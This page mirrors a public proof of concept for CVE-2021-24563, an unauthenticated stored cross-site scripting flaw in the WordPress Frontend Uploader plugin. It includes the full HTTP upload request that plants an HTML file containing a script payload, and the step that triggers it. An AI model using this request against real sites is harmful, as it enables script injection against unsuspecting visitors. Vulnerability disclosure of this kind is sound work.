Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-24563 PoC — WordPress 插件 跨站脚本漏洞

Source
https://github.com/V35HR4J/CVE-2021-24563
Associated Vulnerability
Title:WordPress 插件 跨站脚本漏洞 (CVE-2021-24563)
Description:WordPress 插件是WordPress开源的一个应用插件。 WordPress 插件 Frontend Uploader 1.3.2之前版本存在跨站脚本漏洞,该漏洞源于插件并不阻止HTML文件的上传,例如允许未经认证的用户上传包含JavaScript的恶意HTML文件,当有人直接访问该文件时将触发恶意代码。
Description
The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
Readme
# CVE-2021-24563
Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly

# Proof of Concept

In a page/posts where the [fu-upload-form] shortcode is embed, simply upload an HTML file via the generated form
```

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"

1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html

<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"

upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"

image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"

021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"

92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"

1247
-----------------------------124662954015823207281179831654--


Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html

```
# Video POC:
https://www.youtube.com/watch?v=lfrLoHl4-Zs
File Snapshot

 [4.0K]  /data/pocs/bf5323537f71a9dfe411ab99a4045454f7d08032
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.